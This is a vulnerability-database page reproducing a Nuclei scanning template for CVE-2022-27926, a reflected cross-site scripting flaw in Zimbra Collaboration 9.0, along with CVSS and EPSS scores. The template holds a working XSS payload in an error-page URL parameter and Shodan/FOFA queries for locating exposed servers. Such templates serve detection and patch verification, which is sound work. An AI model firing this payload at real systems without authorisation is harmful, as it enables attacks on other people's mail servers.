Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-27926
HistoryApr 13, 2023 - 12:32 p.m.

Zimbra Collaboration (ZCS) - Cross Site Scripting

2023-04-1312:32:48
ProjectDiscovery
github.com
8
zimbra
collaboration
cve
xss
vulnerability

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

0.962 High

EPSS

Percentile

99.5%

A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
id: CVE-2022-27926

info:
  name: Zimbra Collaboration (ZCS) - Cross Site Scripting
  author: rootxharsh,iamnoooob,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27926
    - https://wiki.zimbra.com/wiki/Security_Center
    - https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24
    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-27926
    cwe-id: CWE-79
    epss-score: 0.96153
    epss-percentile: 0.99504
    cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zimbra
    product: collaboration
    shodan-query:
      - http.favicon.hash:"1624375939"
      - http.favicon.hash:"475145467"
    fofa-query:
      - app="zimbra-้‚ฎไปถ็ณป็ปŸ"
      - icon_hash="475145467"
      - icon_hash="1624375939"
  tags: cve,cve2022,zimbra,xss,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain)>Title???'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009882f70ed07242d0579852b4d10071c39548ed0dd66545666430f1540f7e6441022018cf7b7f77af8980193ab52a596804d710a77ae89b0c33efe93b424a0ba74e11:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

0.962 High

EPSS

Percentile

99.5%